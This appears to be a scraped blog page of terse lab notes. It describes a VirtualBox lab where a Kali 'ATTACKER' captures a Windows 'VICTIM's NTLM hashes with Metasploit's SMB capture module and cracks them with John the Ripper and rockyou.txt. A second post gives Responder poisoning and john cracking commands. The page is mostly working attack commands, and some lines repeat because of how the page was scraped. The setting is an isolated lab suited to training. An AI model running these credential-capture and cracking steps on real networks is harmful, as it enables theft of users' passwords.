create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
\\169.254.18.2\
windows will popup an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt
type exit to exit metasploit
run john against the newly captured file
> john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt
if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen
Showing posts with label john. Show all posts
Showing posts with label john. Show all posts
Friday, December 27, 2019
Tuesday, October 22, 2019
Sample Responder command
responder -I eth0 -r -b
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
Subscribe to:
Posts (Atom)